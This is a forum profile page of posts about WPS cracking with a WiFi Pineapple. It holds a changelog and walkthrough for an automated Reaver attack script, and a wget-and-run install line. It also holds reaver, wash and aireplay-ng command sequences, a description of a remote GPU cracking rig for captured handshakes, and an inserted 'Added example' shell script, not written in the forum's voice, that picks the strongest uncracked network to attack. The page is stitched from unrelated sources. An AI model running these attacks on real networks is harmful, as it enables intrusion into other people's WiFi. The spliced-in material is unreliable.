airman_dopey

Active Members
  • Posts: 158
  • Days Won: 2

Posts posted by airman_dopey

  1. Updated to version 1.1. Change log is as follows:

    - Fixed bug where installing to USB would fail
    - Added Aireplay-ng and Reaver monitoring. This allows the script to ensure everything is running properly and, if either program fails, to relaunch the suspect program up to the threshold set at the beginning of the script (currently set to 3)
    - Added signal checking to discard a network if its signal strength is below -81 as shown by wash
    - Added flag to bypass minimum signal strength check
    - Added output flag to send a copy of all output to file
    - Added ability to have second press of WPS button close script gracefully (This function requires the WPS button script to be rewritten by running the install portion of the script).
    - Added steadily blinking light to signify script is waiting "N" seconds prior to starting attack
    - Added sanity checks to verify Reaver and Aireplay-ng are installed prior to running
    - Fixed numerous bugs relating to the overall function of the script
    

    If you are upgrading from an older version please make sure you run the install again and overwrite the WPS button script to add the button-cancel function of the script

    Thank you all who have tried this script. I hope it is useful.

  2. In response to the above post, has anyone purchased a more powerful juice battery pack and had success with powering the USB drive?

    A friend of mine bought the Anker3 and powers the pineapple, powered hub with a USB drive and Alfa NHA card, and a RasPI, and gets approx. 13 hours running off that setup. So yeah, it'll power the USB drive

  3. EDIT 2: Version 1.2 of the script has been released. See post 16 for changes

    EDIT: Version 1.1 of the script has been released. See 3rd post for changes

    Hope this is the right section.

    Hey guys. I was researching Reaver attacks straight from the pineapple and I could not find anything I liked. I wanted something completely automated from the WPS button. Since I couldn't find one I wrote one and thought I'd share.

    This script attempts a WPS attack utilizing Reaver and the wifi pineapple
    
    Usage: ./reaver.sh [-b BSSID] [-d] [-e ESSID] [-f] [-h] [-i location]
               [-w time] [-o file] [-s]
    
        -b BSSID    When scanning for networks this BSSID will be attacked
                    regardless of both signal strength and if it was
                    cracked before. (Note: When scanning networks if both
                    ESSID and BSSID are listed the BSSID is used first)
    
        -d          Debug mode: Prints extra information to
                    help with debugging
    
        -e ESSID    When scanning for networks this ESSID will be attacked
                    regardless of both signal strength and if it was
                    cracked before. (Note: When scanning networks if both
                    ESSID and BSSID are listed the BSSID is used first)
    
        -f          Force attack of closest network
                    (override check of previously cracked networks)
    
        -h          This screen
    
        -i          Installs Reaver (if missing) and offers
                    to integrate with WPS button.
                    (Requires internet connection)
    
        -o file     Sends copy of all output to file
    
        -s          Overrides the minimum signal strength required
    
        -w delay    wait "N" seconds before beginning attack
    
    

    (The help screen of the script)

    Basically here's how the script runs: once you push the WPS button, it will start with phase 1 and blink the light once. During this phase karma will be stopped and the wireless card will be prepped for the attack.

    Once this is complete the WPS light will blink twice and phase 2 will start. This is where the pineapple will start scanning for networks using wash. The first thing that happens is that it checks the self-created "cracked.txt" for previously cracked networks and omits them from the scan (unless the -f argument is used). It then checks all the networks seen and, if an ESSID or BSSID was requested, it will use that network if visible. If not seen, it will attack the network with the strongest signal.

    Once the network is determined it will switch to phase 3 and the WPS light will blink 3 times. This is where the actual attack starts. Aireplay-ng will attempt to associate with the network and, if successful, Reaver will begin. Once Reaver completes the WPS light will light back up and the network will be saved in the cracked.txt file.

    If any errors happen throughout the script it will stall out and the WPS light will start flashing off and on. I have really tried to capture all possible errors, but since I cannot foresee all problems, if you run into any, please let me know and I will modify my script.

    Installation is extremely simple. Just SSH into your pineapple, and while in the "/root" directory (which is the default directory when you SSH in) run ONE of the following commands to install the script:

    To install Reaver:

    wget http://hax0rbl0x.googlecode.com/files/reaver.sh; chmod +x reaver.sh; ./reaver.sh -i
    

    Once that is installed, follow the post-installation instruction, or if you selected to modify the WPS button functionality, simply press the WPS button.

    I have tested this using just the Pineapple holiday bundle and it works like a charm. Not only that, but simply using the pineapple juice for power the pineapple was still going 14 hours later. I guess karma really eats up the battery. So just the pineapple juice should be sufficient for any attacks you are trying to accomplish. If for some reason you run out of juice prior to Reaver finishing the attack it will pick up where it left off.

    Hope you guys like it. Enjoy.
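The target-selection and supervision logic described in the changelog and the phase walkthrough above (skip networks already in cracked.txt unless forced, discard anything wash reports below -81, prefer a requested BSSID over a requested ESSID, relaunch a failed helper up to the threshold, and check that the tools are installed first), written out as an added example. This is standalone POSIX sh written for this page, not the original reaver.sh; the wash listing is constructed, and the cracked.txt layout (BSSID as the first field of each line) and the relaunch threshold of 3 are assumptions.

```shell
#!/bin/sh
# Added example, not the original reaver.sh: target selection and helper
# supervision as described in the changelog and phase walkthrough, as plain
# POSIX sh functions that can be exercised offline.
# Assumptions (not stated on the page): cracked.txt holds one entry per line
# with the BSSID as the first field; the relaunch threshold is 3.

MIN_RSSI=-81                                 # wash RSSI below this is discarded
MAX_RELAUNCH=3                               # failed helper is relaunched this often
CRACKED_FILE=${CRACKED_FILE:-./cracked.txt}  # networks already cracked

# Constructed sample wash output; not a real scan.
SAMPLE_WASH='BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
--------------------------------------------------------------------------------------
00:11:22:33:44:55    11       -52   1.0          No          HomeNet
66:77:88:99:AA:BB    6        -85   1.0          No          FarAway
CC:DD:EE:FF:00:11    1        -60   1.0          No          Office'

# Sanity check: every tool named on the command line must be in PATH.
check_deps() {
    for tool in "$@"; do
        command -v "$tool" >/dev/null 2>&1 || { echo "missing: $tool" >&2; return 1; }
    done
    return 0
}

# pick_target WASH_OUTPUT [BSSID] [ESSID] [FORCE] [IGNORE_SIGNAL]
# Prints "BSSID CHANNEL ESSID" for the network to attack, or nothing.
# A requested BSSID wins over a requested ESSID, and either is used regardless
# of signal strength or cracked.txt; otherwise the strongest network that is
# not in cracked.txt (unless FORCE=1) and not below MIN_RSSI (unless
# IGNORE_SIGNAL=1) is chosen.
pick_target() {
    printf '%s\n' "$1" | awk -v want_bssid="$2" -v want_essid="$3" \
        -v force="${4:-0}" -v ignore_sig="${5:-0}" \
        -v min_rssi="$MIN_RSSI" -v cracked_file="$CRACKED_FILE" '
    BEGIN {
        if (cracked_file != "")
            while ((getline line < cracked_file) > 0) {
                split(line, f, " "); cracked[toupper(f[1])] = 1
            }
        best_rssi = -999
    }
    NR <= 2 || NF < 6 { next }                  # header, separator, blank lines
    {
        bssid = toupper($1); chan = $2; rssi = $3 + 0
        essid = $6; for (i = 7; i <= NF; i++) essid = essid " " $i
        rec = bssid " " chan " " essid
        if (want_bssid != "" && toupper(want_bssid) == bssid) bssid_hit = rec
        if (want_essid != "" && want_essid == essid) essid_hit = rec
        if (!force && (bssid in cracked)) next    # cracked before
        if (!ignore_sig && rssi < min_rssi) next  # too weak
        if (rssi > best_rssi) { best_rssi = rssi; best = rec }
    }
    END {
        if (bssid_hit != "") print bssid_hit
        else if (essid_hit != "") print essid_hit
        else if (best != "") print best
    }'
}

# run_with_relaunch CMD [ARGS...]: rerun CMD when it exits non-zero, giving
# up after MAX_RELAUNCH failures (the aireplay-ng/Reaver monitoring of 1.1).
run_with_relaunch() {
    failures=0
    while :; do
        "$@" && return 0
        failures=$((failures + 1))
        [ "$failures" -ge "$MAX_RELAUNCH" ] && return 1
    done
}

# On the pineapple this would be used roughly as:
#   check_deps reaver wash aireplay-ng || exit 1
#   target=$(pick_target "$scan")      # $scan holds a captured wash listing
#   run_with_relaunch reaver ... || flash_error_light
```

Note that with the sample listing and an empty cracked.txt the strongest network (HomeNet, -52) is chosen; once it is recorded as cracked the script falls through to Office, because FarAway at -85 fails the -81 check unless the signal override is given.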

  4. Same issue. Also does not work when using the pineapple juice (which really frustrated me). I feel for you. Very frustrating when you purchase things from a store expecting them to work with one another and there is no mention by the store that they do not. The hakshop still doesn't say anything about this issue and it has been reported numerous times in the forums. The lack of communication (or lack of caring, but I am attempting to give the benefit of the doubt) is atrocious.

  5. Output of wash is as follows:

    BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
    --------------------------------------------------------------------------------------
    XX:XX:XX:XX:XX:XX    11       -52   1.0          No          XXXX
    
    

    This is while sitting in the same room as the AP using the Alfa 7 dB panel antenna.

    So I may have made a small error. When I tried to run aireplay to generate traffic it kept erroring out with a WPA error. But it seems to be case sensitive. When I did my ESSID exactly as listed it was showing as connected. When I tried running reaver in a separate terminal it started cracking. I will edit this post after a successful test with all the commands I used in order, but it seems to be working now. Thank you for all your help.

  6. I prefer using reaver and wash from terminal. I have had better luck this way.

    The commands I use are:

    airmon-ng start wlan0

    ifconfig wlan0 down

    wash -i mon0

    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -a -c XX -vv

    If you don't know what wash does, it displays only WPS enabled access points.

    Hope this helps.

    -SymPak

    Thank you for your response. I tried following your commands and get the same thing. When I leave wlan0 up the "failed to associate" messages appear approx. once every 10-12 seconds. With wlan0 down and only mon0 up the failed messages spam every second. With that being said, wash displays the APs in my area properly.

    I think I am going to attempt to reflash my pineapple and start over and see if that makes a difference.

    *EDIT* Reflashed, did an opkg update, opkg install reaver, and then ran the commands listed above, same thing. Tried bringing wlan0 back up, no change (other than the time between error messages again).

    *EDIT 2* Tried on a separate AP and same result.

  7. Has anyone else worked out the "failed to associate" issue with Reaver? I have tried the following:

    Firmware at 2.8.1 stable

    Installed the reaver 0.4 module

    ~In Module~

    Stopped wlan0

    started wlan0

    started mon0

    scanned for APs

    selected my AP (WPS enabled, good signal)

    Selected auto detect and set channel choices

    Started attack

    At this point I get the failed to associate message. So I switched to the CLI via SSH.

    ~CLI~

    ifconfig wlan0 down

    airmon-ng start wlan0

    ifconfig wlan0 up

    ifconfig mon0 down

    ifconfig mon0 up

    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -a -c 11 -vv

    and I get failed to associate. So I tried using aireplay-ng

    ~CLI~

    aireplay-ng -1 5 -a XX:XX:XX:XX:XX:XX -e ESSID mon0   (also tried with -1 120)

    comes back with "could not determine channel". Tried setting channel by dropping wlan0 and changing it using "iw wlan0 set channel 11" and still nothing. Tried doing the same for mon0 but regardless of the interface being up or down the interface states that it is busy when I try to change the channel of mon0.

    At this point I am completely out of ideas. Any ideas?

    *edit* I have also tried using the exact same reaver command on my Kali build running side by side and the reaver attack through Kali works fine. So I know my AP is not immune to the attack

  8. Seeing as this would be used for strictly malicious purposes expect a warning at the very least from the mods. This is a security integrity community, not a group of petty vandals.

  9. What's the best antenna for the pineapple?

    I am trying to find one with a 3 to 4 mile range.

    Open terrain? City? Through buildings? omni or uni directional?

    There is no "best antenna" and I doubt you're going to get your 3-4 mile range unless you have a very specific scenario in mind.

  10. Thought I would post my gear as well.

    IMG_20130228_151218.jpg

    -Laptop is an Acer Aspire, nothing fancy, but it has an Atheros chipset for wireless

    -Pineapple with the travel pack (pineapple juice and case)

    -A couple of 5 dB rubber duckie antennas

    -a 7 dB Alfa panel antenna

    -9 dB antenna found in the HakShop

    -14.3 dB yagi cantenna with the vanguard tripod

    -LAN wiretap

    -Alfa 036H NIC

    -Squid hub and misc. dongles/hubs/flash drives etc

    Something else I cannot easily take pictures of (but can screenshot) is my server that's on 24/7. I host files through it to the house and thought about making it a "cracking rig". So I threw an old GTX285 in it and beefed up the power supply. With that I added GPU cracking to it and wrote some scripts to automate my dictionary/brute force attacks.

    Transfer.jpg

    A simple script on my laptop allows me to check the pcap file and sftp it to my home rig (using dynamic DNS).

    Crack_Menu.png

    Once the file transfers to my server I SSH in and load the main menu script. You can see some of the things I have added already.

    Config.png

    This is the configuration menu where I can pick which wordlists to use. I have over 33 gigs of wordlists stored on the machine. Additionally, I can spawn the processes into the background and let them run by themselves. For notifications I have my rig programmed to text me with status messages (wordlist started, finished, password found/not found). This way I can be in the field and, once capturing a handshake, forward it on to my rig and go eat some lunch or something while my machine back home does all the heavy lifting. Once the machine finds the info, I receive a text on my phone that looks like this:

    Screenshot_2013-02-28-15-08-51.png

    It's not pretty ATM, but it is extremely functional. I'm looking to add hash cracking and similar tools to it. No point in using my feeble laptop for cracking when I can let full blown desktops do it much much faster.

  11. Link 1: Yes, a higher gain antenna will give you further range, but keep in mind that an omni directional antenna has a donut-shaped range. The higher the gain, the flatter the donut (to the point that even a couple feet higher than the antenna will cause you to have no signal). I am not a radio professional, so I cannot say how the 12 dB antenna will perform, but I have a 9 dB one from the hakshop and it works very well.

    As for the second link, yes, that is the one
